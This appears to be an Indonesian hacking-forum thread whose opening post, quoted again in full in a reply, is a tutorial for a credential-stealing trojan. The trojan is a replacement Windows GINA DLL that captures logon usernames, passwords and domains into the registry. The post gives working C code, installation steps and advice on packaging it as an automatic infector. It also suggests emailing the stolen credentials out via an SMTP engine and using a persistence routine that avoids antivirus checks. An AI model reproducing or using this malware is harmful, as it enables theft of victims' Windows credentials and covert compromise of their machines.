IndeksPendaftaranLogin

Share | 
 

 SPOOFING LOGIN ACCOUNT WINDOWS

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : 1, 2  Next
PengirimMessage
mindhack
Verified Phreaker
Verified Phreaker
avatar

Jumlah posting : 347
Join date : 13.05.10

PostSubyek: SPOOFING LOGIN ACCOUNT WINDOWS   Mon May 24, 2010 3:55 pm



^;^

Spoofing Login Account Windows

NB. Tidak dimaksudkan untuk disalahgunakan.. Hanya untuk PEMBELAJARAN semata..

FORUM : [You must be registered and logged in to see this link.] etc etc etc etc etc etc etc etc etc
BLOG : [You must be registered and logged in to see this link.]
FB : MIND HACK
WEB : ???????????????????????????????????????????????????????????????????????????????


Code:
Spoofing Login Account Windows

NB. Tidak dimaksudkan untuk disalahgunakan.. Hanya untuk PEMBELAJARAN semata..

FORUM    : http://joglocyber.my-goo.com
BLOG   : http://hacking.philosophy.blogspot.com
FB    : MIND HACK
WEB   : ????

Banyak beredar di Internet program-program yang mengklaim mempunyai kemampuan untuk
‘membongkar’ informasi account (username, password, domain) Windows seseorang.
Jika diteliti, mayoritas dari program tersebut menggunakan teknik brute-attack yang agak susah
diharapkan keberhasilannya. Selain itu, teknik ini memakan resource yang cukup besar, baik
dari sisi waktu maupun resource fisik. Pada artikel ini penulis akan mencoba menjelaskan satu
teknik alternatif untuk mendapatkan informasi tadi dengan metoda yang relatif sederhana.
Sistem Keamanan Windows
Ketika seseorang login ke Windows, sistem akan memulai satu proses interaksi logon,
yang ditangani oleh program winlogon.exe. Pada sesi ini, Windows akan menciptakan tiga
konteks desktop (tampilan) yaitu:
- login desktop (desktop ketika kita mengisikan username dan password)
- user’s desktop (tampilan desktop yang kita pakai sehari-hari)
- screen saver desktop (desktop untuk menampilkan screen saver dan mengunci sistem)
Tahap selanjutnya adalah winlogon akan mendaftarkan intersepsi (keyboard hook) kombinasi
keyboard SAS (Secure Attention Sequence), yaitu kombinasi penekanan tombol Ctr+Alt+Del.
SAS ini dipakai untuk berpindah dari konteks user’s desktop ke login dekstop.
Ketika pertama kali seseorang login ke Windows, sebenarnya orang tersebut mengetikkan
username, password, dan domain di tampilan login desktop. Informasi ini kemudian akan
dikirimkan ke LSA (Local Security Authority) Server. Jika berhasil terotentikasi, winlogon akan
menciptakan satu token akses untuk user ini, yang kadang kita kenal dengan istilah SID
(=Security ID). SID ini yang kemudian akan menentukan akses level si user terhadap semua
resource yang tersedia di sistem Windows tersebut. Pada akhirnya, winlogon akan berpindah ke
konteks user’s desktop dan akan terus di sini sampai user mengaktifkan SAS dengan menekan
kombinasi tombol Ctr+Alt+Del atau sistem mengaktifkan screen saver.
1.1. Celah Keamanan
Terlihat bahwa ada beberapa celah yang dapat kita manfaatkan untuk mendapatkan informasi
logon seseorang:
- Intersepsi (melakukan pencegatan) ketika user mengetikkan informasi logon di login
desktop
- Meng-hack LSA Server / SAM database
- Memanipulasi SID
- Teknik-teknik lainnya.
Pada artikel ini, penulis akan menjelaskan mengenai teknik pertama, yaitu intersepsi.
1.2. Intersepsi
Dari deskripsi di atas, terlihat bahwa intersepsi paling cocok dilakukan di konteks login desktop,
sebab di sinilah user mengetikkan informasi login. Konteks ini ditandai dengan diaktifkannya
SAS oleh user dengan menekan kombinasi Ctr+Alt+Del, atau pada pertama kali user login ke
Windows. Secara real, proses ini sebenarnya bukan ditangani langsung oleh winlogon, namun
didelegasikan ke satu proses yang disebut GINA (Graphical Identification and Authentication).
GINA diimplementasikan oleh Windows mengunakan satu DLL yang di simpan di folder
C:\WINNT\SYSTEM32 dengan nama msgina.dll. Anda tanpa sadar sering berinteraksi dengan
file ini, yaitu pada saat Anda login, atau pada saat Anda menekan Ctr+Alt+Del untuk merubah
password, menjalankan Task Manager, shutdown, atau fungsi lainnya.
Yang menarik, Windows memberi kesempatan bagi kita untuk mengganti msgina. Hal ini sangat
berguna jika kita ingin merubah karakteristik proses login, misal: login dengan menggunakan
smart card, retina reader, login bertingkat (sinkronisasi account Windows ke net provider lain
misal Novell, atau ERP/mail server), atau bahkan hanya sekedar mengganti logo di dialog gantipassword
Windows. Pada artikel ini, akan dijelaskan mengenai pembuatan GINA DLL yang bisa
memenuhi kebutuhan dasar kita (yang sebenarnya sangat sederhana), yaitu menangkap dan
menyimpan informasi logon seseorang.
Produk akhir dari artikel ini adalah sebuah trojan yang jika terinstal di komputer korban, akan
menyimpan informasi account Windows user yang logon ke dalam registry. Nantinya informasi
ini bisa saja dikirim via email oleh trojan kita, dengan menambahkannya dengan utility-utility
tertentu yang akan dijelaskan di akhir artikel ini.
1.3. Pembuatan GINA DLL
Dalam pembuatan GINA DLL, digunakan bahasa C (bukan C++). Tidak perlu berpikir sulit-sulit,
karena Visual C++ (dengan MSDN-nya) sudah menyediakan kerangka GINA DLL yang dapat
kita manfaatkan. Silahkan Anda cari di MSDN dengan keyword ‘ginastub.c’. Stub tersebut ditulis
oleh seseorang di Microsoft. Stub ini (setelah di-compile menjadi DLL) akan berfungsi sebagai
inceptor (pencegat) dan kemudian tetap meneruskan alur program ke DLL yang di-‘bajak’.
Teknik ini biasa digunakan untuk membajak fungsi-fungsi API Windows. Keuntungan teknik ini
adalah programming effort yang dibutuhkan relatif kecil, yaitu cukup menyediakan prototype
program yang akan dibajak, tambahkan kode kita pada fungsi-fungsi yang akan di-intersep, lalu
kembalikan alur proses ke fungsi yang asli. Dengan demikian, karakter program dapat dibuat
hampir menyerupai program asli sehingga mengurangi kecurigaan si korban. Teknik ini pada
dasarnya serupa dengan yang digunakan penulis ketika membuat artikel Keylogger di beberapa
edisi terdahulu.
Di bawah ini adalah protoype GINA DLL.
typedef BOOL (WINAPI *PGWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PGWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PGWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PGWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD,
PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PGWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
typedef int (WINAPI *PGWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PGWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PGWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PGWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PGWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PGWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PGWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PGWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PGWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
Jangan pusing dulu, pada dasarnya fungsi-fungsi di atas berguna untuk menciptakan
karakteristik login yang kita inginkan. Prefix PGWLX adalah identifikasi bahwa ini adalah global
pointer fungsi winlogon. Dengan menghilangkan prefix tadi, kegunaan fungsi-fungsi di atas bisa
ditebak, seperti misalnya Negotiate (untuk negosiasi awal), Initialize (untuk inisialisasi sistem),
LoggedoutSAS (log out), dsb. Tabel di bawah ini menjelaskan mengenai penggunaan sebagian
fungsi-fungsi di atas di setiap status logon.
Status logon Fungsi winlogon yang dijalankan
Booting WlxNegotiate()
WlxInitialize()
Sebelum dan ketika
Logged-on
WlxSASNotify()
WlxLoggedOutSAS()
Setelah Logged-on WlxSASNotify()
WlxLoggedOnSAS()
Lock WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOCKWINSTA
Unlock WlxSASNotify()
WlxWkstaLockedSas()  returning WLX_UNLOCKWINSTA
Log-off
(by Ctr+Alt+Del)
WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOGOFFUSER
WlxLogoff()
Shutdown
(by Ctr+Alt+Del)
WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOGOFFANDSHUTDOWN
WlxLogoff()
WlxShutdown()
Pada artikel ini, penulis hanya akan menjelaskan fungsi WlxLoggedOutSAS().
Fungsi WlxLoggedOutSAS()
Terlihat bahwa fungsi ini akan aktif ketika sistem dalam keadaan logged-out. Dalam keadaan ini,
belum ada seorang pun logged-on di sistem. Keadaan ini bisa dijumpai pada saat kita
menjalankan komputer untuk pertama kali (sebelum login) atau sesaat setelah kita logoff. Pada
keadaan ini, konteks yang aktif adalah login dekstop. Sesaat setelah Anda mengetikkan
username, password, dan domain, dan kemudian menekan tombol OK, maka fungsi ini akan
dijalankan. Informasi yang Anda ketikkan akan diproses dan disimpan di sebuah pointer
bernama pMprNotifyInfo. Pointer inilah yang kemudian diekstrak untuk menangkap informasi
yang diinginkan.
Adapun struktur pointer tersebut adalah sebagai berikut:
typedef struct _WLX_MPR_NOTIFY_INFO {
PWSTR pszUserName;
PWSTR pszDomain;
PWSTR pszPassword;
PWSTR pszOldPassword;
} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
Pada halaman berikut akan ditampilkan listing fungsi ini secara lengkap. Baris yang diarsir
(berwarna hijau) adalah baris tambahan kita, yang berfungsi untuk ‘menangkap’ informasi
account yang dimasukan oleh user, lalu menyimpannya di satu tempat di registry. Yang penting
untuk diperhatikan, pada konteks login desktop, SID yang aktif adalah sebagai SYSTEM, bukan
sebagai user tertentu seperti yang berlaku di konteks user’s desktop. Ini yang menyebabkan
penulis menyimpan informasi di HKEY_LOCAL_MACHINE, bukan di HKEY_CURRENT_USER. Fakta ini
juga menarik untuk disimak, sebab bisa dimanfaatkan untuk membuat ekploitasi jenis lain, yang
dapat mem-promote level akses lokal kita (misal: dari user ke admin) di satu sistem yang
mempunyai tingkat restriksi tinggi, misalnya di kantor, di kampus, atau di beberapa warnet.
RunLogonScript()adalah fungsi buatan sendiri, yang dipakai untuk menjalankan skrip atau
program tertentu pada saat login. Banyak virus atau trojan yang mengaktifkan rutinnya setiap
kali Windows dijalankan dengan meletakkan nama program pengaktif di
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Masalahnya,
lokasi ini adalah lokasi pertama yang akan diperiksa oleh pembasmi virus/trojan. Fungsi
RunLogonScript() ini dapat menjadi alternatif untuk itu. WriteStringToRegistry() adalah
fungsi buatan sendiri untuk menulis string ke satu key tertentu di registry.
int WINAPI WlxLoggedOutSAS(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
int iRet;
TCHAR szUsername [MAX_LENGTH];
TCHAR szPassword [MAX_LENGTH];
TCHAR szDomain [MAX_LENGTH];
iRet = GWlxLoggedOutSAS(
pWlxContext,
dwSasType,
pAuthenticationId,
pLogonSid,
pdwOptions,
phToken,
pMprNotifyInfo,
pProfile
);
if(iRet == WLX_SAS_ACTION_LOGON) {
SetCursor(LoadCursor(NULL, IDC_WAIT));
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszUserName,
-1,
szUsername,
sizeof(szUsername),
NULL,NULL);
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszDomain,
-1,
szDomain,
sizeof(szDomain),
NULL,NULL);
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszPassword,
-1,
szPassword,
sizeof(szPassword),
NULL,NULL);
// save username
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Username",
szUsername);
// save password
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Password",
szPassword);
// save domain
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Domain",
szDomain);
RunLogonScript();
}
return iRet;
}
Demikian, cukup sekian perubahan yang perlu kita lakukan.
Kompilasi
Kode dikemas dalam satu project Visual C++, dengan nama ‘newgina’. Anda dianjurkan untuk
mempelajari sendiri file-file project, mengingat keterbatasan tempat di artikel ini untuk
membahasnya satu persatu. Source code tersedia on request.
Untuk mengkompilasi sebuah DLL, cukup masuk ke menu BuildRebuild All di lingkungan
Visual C++. Setelah proses build selesai, dapatkan newgina.dll di folder /release.
1.4. Instalasi
Untuk instalasi, kopikan file newgina.dll ke C:\WINNT\SYSTEM32.
Kemudian jalankan regedit, masukan entry baru ke
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon dengan
nama GinaDLL dan value newgina.dll, seperti ditampilkan di bawah ini.
Untuk trojan yang sesungguhnya, tentunya prosedur instalasi ini sebaiknya dikemas ke dalam
satu rutin infektor yang compact, sehingga dengan cepat dapat terinstal di sistem si korban
secara otomatis.
Hasil
Untuk melihat hasilnya, restart komputer Anda. Setelah proses login selesai, jalankan regedit.
Temukan hasil dari tangkapan di cabang HKEY_LOCAL_MACHINE\SOFTWARE\Dewanata. Terlihat
bahwa informasi account seperti username, password, dan domain dengan mudah dapat kita
ketahui.
1.5. Pengembangan Selanjutnya
Dengan mengetahui proses dasar, maka Anda dengan mudah dapat mengembangkan program
ini menjadi sebuah trojan yang powerfull. Contohnya adalah dengan menambahkan SMTP
engine dan rutin penyebar/infector. Dengan menambahkan SMTP engine, trojan
(setelah terinstal) bisa diperintahkan untuk mengirimkan informasi account ke alamat email
tertentu. Ingat, program ini telah dilengkapi dengan fungsi RunLogonScript() sehingga dapat
dimanfaatkan untuk menjalankan sebuah program residen, yang kemudian mengaktifkan rutin
pengiriman email atau payload infektor berdasarkan satu event/timer tertentu.
Secara positif, teknik ini dapat kita manfaatkan untuk melakukan multiple login ke beberapa
provider atau server, yang tidak memiliki fasilitas account synchronization. Di beberapa software
komersil yang dikembangkan penulis, ada satu kasus di mana software tersebut membantu
mensinkronisasikan informasi account Windows (termasuk jika ada perubahan info account
seperti ganti password) ke 4 (empat) ERP dan mail server, sehingga terwujud satu lingkungan
single logon di atas beberapa sistem yang berbeda-beda.
Menarik bukan?

Good luck.. xixixixiix..
^;^

Kembali Ke Atas Go down
dawank
Cs Moderator
Cs Moderator
avatar

Jumlah posting : 743
Join date : 19.05.10
Age : 32
Lokasi : Di Mari

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon May 24, 2010 5:32 pm

mindhack wrote:


^;^

Spoofing Login Account Windows

NB. Tidak dimaksudkan untuk disalahgunakan.. Hanya untuk PEMBELAJARAN semata..

FORUM : [You must be registered and logged in to see this link.] etc etc etc etc etc etc etc etc etc
BLOG : [You must be registered and logged in to see this link.]
FB : MIND HACK
WEB : ???????????????????????????????????????????????????????????????????????????????


Code:
Spoofing Login Account Windows

NB. Tidak dimaksudkan untuk disalahgunakan.. Hanya untuk PEMBELAJARAN semata..

FORUM    : http://joglocyber.my-goo.com
BLOG   : http://hacking.philosophy.blogspot.com
FB    : MIND HACK
WEB   : ????

Banyak beredar di Internet program-program yang mengklaim mempunyai kemampuan untuk
‘membongkar’ informasi account (username, password, domain) Windows seseorang.
Jika diteliti, mayoritas dari program tersebut menggunakan teknik brute-attack yang agak susah
diharapkan keberhasilannya. Selain itu, teknik ini memakan resource yang cukup besar, baik
dari sisi waktu maupun resource fisik. Pada artikel ini penulis akan mencoba menjelaskan satu
teknik alternatif untuk mendapatkan informasi tadi dengan metoda yang relatif sederhana.
Sistem Keamanan Windows
Ketika seseorang login ke Windows, sistem akan memulai satu proses interaksi logon,
yang ditangani oleh program winlogon.exe. Pada sesi ini, Windows akan menciptakan tiga
konteks desktop (tampilan) yaitu:
- login desktop (desktop ketika kita mengisikan username dan password)
- user’s desktop (tampilan desktop yang kita pakai sehari-hari)
- screen saver desktop (desktop untuk menampilkan screen saver dan mengunci sistem)
Tahap selanjutnya adalah winlogon akan mendaftarkan intersepsi (keyboard hook) kombinasi
keyboard SAS (Secure Attention Sequence), yaitu kombinasi penekanan tombol Ctr+Alt+Del.
SAS ini dipakai untuk berpindah dari konteks user’s desktop ke login dekstop.
Ketika pertama kali seseorang login ke Windows, sebenarnya orang tersebut mengetikkan
username, password, dan domain di tampilan login desktop. Informasi ini kemudian akan
dikirimkan ke LSA (Local Security Authority) Server. Jika berhasil terotentikasi, winlogon akan
menciptakan satu token akses untuk user ini, yang kadang kita kenal dengan istilah SID
(=Security ID). SID ini yang kemudian akan menentukan akses level si user terhadap semua
resource yang tersedia di sistem Windows tersebut. Pada akhirnya, winlogon akan berpindah ke
konteks user’s desktop dan akan terus di sini sampai user mengaktifkan SAS dengan menekan
kombinasi tombol Ctr+Alt+Del atau sistem mengaktifkan screen saver.
1.1. Celah Keamanan
Terlihat bahwa ada beberapa celah yang dapat kita manfaatkan untuk mendapatkan informasi
logon seseorang:
- Intersepsi (melakukan pencegatan) ketika user mengetikkan informasi logon di login
desktop
- Meng-hack LSA Server / SAM database
- Memanipulasi SID
- Teknik-teknik lainnya.
Pada artikel ini, penulis akan menjelaskan mengenai teknik pertama, yaitu intersepsi.
1.2. Intersepsi
Dari deskripsi di atas, terlihat bahwa intersepsi paling cocok dilakukan di konteks login desktop,
sebab di sinilah user mengetikkan informasi login. Konteks ini ditandai dengan diaktifkannya
SAS oleh user dengan menekan kombinasi Ctr+Alt+Del, atau pada pertama kali user login ke
Windows. Secara real, proses ini sebenarnya bukan ditangani langsung oleh winlogon, namun
didelegasikan ke satu proses yang disebut GINA (Graphical Identification and Authentication).
GINA diimplementasikan oleh Windows mengunakan satu DLL yang di simpan di folder
C:\WINNT\SYSTEM32 dengan nama msgina.dll. Anda tanpa sadar sering berinteraksi dengan
file ini, yaitu pada saat Anda login, atau pada saat Anda menekan Ctr+Alt+Del untuk merubah
password, menjalankan Task Manager, shutdown, atau fungsi lainnya.
Yang menarik, Windows memberi kesempatan bagi kita untuk mengganti msgina. Hal ini sangat
berguna jika kita ingin merubah karakteristik proses login, misal: login dengan menggunakan
smart card, retina reader, login bertingkat (sinkronisasi account Windows ke net provider lain
misal Novell, atau ERP/mail server), atau bahkan hanya sekedar mengganti logo di dialog gantipassword
Windows. Pada artikel ini, akan dijelaskan mengenai pembuatan GINA DLL yang bisa
memenuhi kebutuhan dasar kita (yang sebenarnya sangat sederhana), yaitu menangkap dan
menyimpan informasi logon seseorang.
Produk akhir dari artikel ini adalah sebuah trojan yang jika terinstal di komputer korban, akan
menyimpan informasi account Windows user yang logon ke dalam registry. Nantinya informasi
ini bisa saja dikirim via email oleh trojan kita, dengan menambahkannya dengan utility-utility
tertentu yang akan dijelaskan di akhir artikel ini.
1.3. Pembuatan GINA DLL
Dalam pembuatan GINA DLL, digunakan bahasa C (bukan C++). Tidak perlu berpikir sulit-sulit,
karena Visual C++ (dengan MSDN-nya) sudah menyediakan kerangka GINA DLL yang dapat
kita manfaatkan. Silahkan Anda cari di MSDN dengan keyword ‘ginastub.c’. Stub tersebut ditulis
oleh seseorang di Microsoft. Stub ini (setelah di-compile menjadi DLL) akan berfungsi sebagai
inceptor (pencegat) dan kemudian tetap meneruskan alur program ke DLL yang di-‘bajak’.
Teknik ini biasa digunakan untuk membajak fungsi-fungsi API Windows. Keuntungan teknik ini
adalah programming effort yang dibutuhkan relatif kecil, yaitu cukup menyediakan prototype
program yang akan dibajak, tambahkan kode kita pada fungsi-fungsi yang akan di-intersep, lalu
kembalikan alur proses ke fungsi yang asli. Dengan demikian, karakter program dapat dibuat
hampir menyerupai program asli sehingga mengurangi kecurigaan si korban. Teknik ini pada
dasarnya serupa dengan yang digunakan penulis ketika membuat artikel Keylogger di beberapa
edisi terdahulu.
Di bawah ini adalah protoype GINA DLL.
typedef BOOL (WINAPI *PGWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PGWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PGWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PGWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD,
PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PGWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
typedef int (WINAPI *PGWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PGWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PGWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PGWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PGWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PGWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PGWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PGWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PGWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
Jangan pusing dulu, pada dasarnya fungsi-fungsi di atas berguna untuk menciptakan
karakteristik login yang kita inginkan. Prefix PGWLX adalah identifikasi bahwa ini adalah global
pointer fungsi winlogon. Dengan menghilangkan prefix tadi, kegunaan fungsi-fungsi di atas bisa
ditebak, seperti misalnya Negotiate (untuk negosiasi awal), Initialize (untuk inisialisasi sistem),
LoggedoutSAS (log out), dsb. Tabel di bawah ini menjelaskan mengenai penggunaan sebagian
fungsi-fungsi di atas di setiap status logon.
Status logon Fungsi winlogon yang dijalankan
Booting WlxNegotiate()
WlxInitialize()
Sebelum dan ketika
Logged-on
WlxSASNotify()
WlxLoggedOutSAS()
Setelah Logged-on WlxSASNotify()
WlxLoggedOnSAS()
Lock WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOCKWINSTA
Unlock WlxSASNotify()
WlxWkstaLockedSas()  returning WLX_UNLOCKWINSTA
Log-off
(by Ctr+Alt+Del)
WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOGOFFUSER
WlxLogoff()
Shutdown
(by Ctr+Alt+Del)
WlxSASNotify()
WlxLoggedOnSAS()  returning WLX_LOGOFFANDSHUTDOWN
WlxLogoff()
WlxShutdown()
Pada artikel ini, penulis hanya akan menjelaskan fungsi WlxLoggedOutSAS().
Fungsi WlxLoggedOutSAS()
Terlihat bahwa fungsi ini akan aktif ketika sistem dalam keadaan logged-out. Dalam keadaan ini,
belum ada seorang pun logged-on di sistem. Keadaan ini bisa dijumpai pada saat kita
menjalankan komputer untuk pertama kali (sebelum login) atau sesaat setelah kita logoff. Pada
keadaan ini, konteks yang aktif adalah login dekstop. Sesaat setelah Anda mengetikkan
username, password, dan domain, dan kemudian menekan tombol OK, maka fungsi ini akan
dijalankan. Informasi yang Anda ketikkan akan diproses dan disimpan di sebuah pointer
bernama pMprNotifyInfo. Pointer inilah yang kemudian diekstrak untuk menangkap informasi
yang diinginkan.
Adapun struktur pointer tersebut adalah sebagai berikut:
typedef struct _WLX_MPR_NOTIFY_INFO {
PWSTR pszUserName;
PWSTR pszDomain;
PWSTR pszPassword;
PWSTR pszOldPassword;
} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
Pada halaman berikut akan ditampilkan listing fungsi ini secara lengkap. Baris yang diarsir
(berwarna hijau) adalah baris tambahan kita, yang berfungsi untuk ‘menangkap’ informasi
account yang dimasukan oleh user, lalu menyimpannya di satu tempat di registry. Yang penting
untuk diperhatikan, pada konteks login desktop, SID yang aktif adalah sebagai SYSTEM, bukan
sebagai user tertentu seperti yang berlaku di konteks user’s desktop. Ini yang menyebabkan
penulis menyimpan informasi di HKEY_LOCAL_MACHINE, bukan di HKEY_CURRENT_USER. Fakta ini
juga menarik untuk disimak, sebab bisa dimanfaatkan untuk membuat ekploitasi jenis lain, yang
dapat mem-promote level akses lokal kita (misal: dari user ke admin) di satu sistem yang
mempunyai tingkat restriksi tinggi, misalnya di kantor, di kampus, atau di beberapa warnet.
RunLogonScript()adalah fungsi buatan sendiri, yang dipakai untuk menjalankan skrip atau
program tertentu pada saat login. Banyak virus atau trojan yang mengaktifkan rutinnya setiap
kali Windows dijalankan dengan meletakkan nama program pengaktif di
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Masalahnya,
lokasi ini adalah lokasi pertama yang akan diperiksa oleh pembasmi virus/trojan. Fungsi
RunLogonScript() ini dapat menjadi alternatif untuk itu. WriteStringToRegistry() adalah
fungsi buatan sendiri untuk menulis string ke satu key tertentu di registry.
int WINAPI WlxLoggedOutSAS(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
int iRet;
TCHAR szUsername [MAX_LENGTH];
TCHAR szPassword [MAX_LENGTH];
TCHAR szDomain [MAX_LENGTH];
iRet = GWlxLoggedOutSAS(
pWlxContext,
dwSasType,
pAuthenticationId,
pLogonSid,
pdwOptions,
phToken,
pMprNotifyInfo,
pProfile
);
if(iRet == WLX_SAS_ACTION_LOGON) {
SetCursor(LoadCursor(NULL, IDC_WAIT));
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszUserName,
-1,
szUsername,
sizeof(szUsername),
NULL,NULL);
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszDomain,
-1,
szDomain,
sizeof(szDomain),
NULL,NULL);
WideCharToMultiByte(CP_ACP,0,
pMprNotifyInfo->pszPassword,
-1,
szPassword,
sizeof(szPassword),
NULL,NULL);
// save username
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Username",
szUsername);
// save password
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Password",
szPassword);
// save domain
WriteStringToRegistry(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Dewanata",
"Domain",
szDomain);
RunLogonScript();
}
return iRet;
}
Demikian, cukup sekian perubahan yang perlu kita lakukan.
Kompilasi
Kode dikemas dalam satu project Visual C++, dengan nama ‘newgina’. Anda dianjurkan untuk
mempelajari sendiri file-file project, mengingat keterbatasan tempat di artikel ini untuk
membahasnya satu persatu. Source code tersedia on request.
Untuk mengkompilasi sebuah DLL, cukup masuk ke menu BuildRebuild All di lingkungan
Visual C++. Setelah proses build selesai, dapatkan newgina.dll di folder /release.
1.4. Instalasi
Untuk instalasi, kopikan file newgina.dll ke C:\WINNT\SYSTEM32.
Kemudian jalankan regedit, masukan entry baru ke
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon dengan
nama GinaDLL dan value newgina.dll, seperti ditampilkan di bawah ini.
Untuk trojan yang sesungguhnya, tentunya prosedur instalasi ini sebaiknya dikemas ke dalam
satu rutin infektor yang compact, sehingga dengan cepat dapat terinstal di sistem si korban
secara otomatis.
Hasil
Untuk melihat hasilnya, restart komputer Anda. Setelah proses login selesai, jalankan regedit.
Temukan hasil dari tangkapan di cabang HKEY_LOCAL_MACHINE\SOFTWARE\Dewanata. Terlihat
bahwa informasi account seperti username, password, dan domain dengan mudah dapat kita
ketahui.
1.5. Pengembangan Selanjutnya
Dengan mengetahui proses dasar, maka Anda dengan mudah dapat mengembangkan program
ini menjadi sebuah trojan yang powerfull. Contohnya adalah dengan menambahkan SMTP
engine dan rutin penyebar/infector. Dengan menambahkan SMTP engine, trojan
(setelah terinstal) bisa diperintahkan untuk mengirimkan informasi account ke alamat email
tertentu. Ingat, program ini telah dilengkapi dengan fungsi RunLogonScript() sehingga dapat
dimanfaatkan untuk menjalankan sebuah program residen, yang kemudian mengaktifkan rutin
pengiriman email atau payload infektor berdasarkan satu event/timer tertentu.
Secara positif, teknik ini dapat kita manfaatkan untuk melakukan multiple login ke beberapa
provider atau server, yang tidak memiliki fasilitas account synchronization. Di beberapa software
komersil yang dikembangkan penulis, ada satu kasus di mana software tersebut membantu
mensinkronisasikan informasi account Windows (termasuk jika ada perubahan info account
seperti ganti password) ke 4 (empat) ERP dan mail server, sehingga terwujud satu lingkungan
single logon di atas beberapa sistem yang berbeda-beda.
Menarik bukan?

Good luck.. xixixixiix..
^;^


Kalo kaga punya dasar puyeng juga nie pala baca na [You must be registered and logged in to see this image.]
Udah bolak-balik baca kaga ngarti2 sis [You must be registered and logged in to see this image.]

_________________
[You must be registered and logged in to see this image.][You must be registered and logged in to see this image.][You must be registered and logged in to see this image.]
Kembali Ke Atas Go down
http://www.joglocyber.com/
...hysteria...
Member Aktif
Member Aktif
avatar

Jumlah posting : 122
Join date : 09.05.10
Lokasi : Blackholes

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon May 24, 2010 7:21 pm

izin copas ya bro, mayan buat nambah2in pengetahuan dalam komputer
Kembali Ke Atas Go down
arul
Member
Member
avatar

Jumlah posting : 56
Join date : 03.06.10
Lokasi : Lampung™

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Fri Jun 04, 2010 11:17 am


biasanya aku pake combinasi cntrl+alt+del, tapi kadang2 cara tsb gx berhasil kalo pass adminna drbh, eh ternyata ada trik baru
Kembali Ke Atas Go down
http://www.arul-id.blogspot.com
rusdy
Member Aktif
Member Aktif
avatar

Jumlah posting : 270
Join date : 23.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sat Jun 05, 2010 5:07 am

Yang O'on Betanya ?...
ini maksudnya buat pa yach'..Om Mood.
nga' ngerti saya JUJUR dech'....

Mohon Penjelasan nya,..Boleh !...
Kembali Ke Atas Go down
luna25
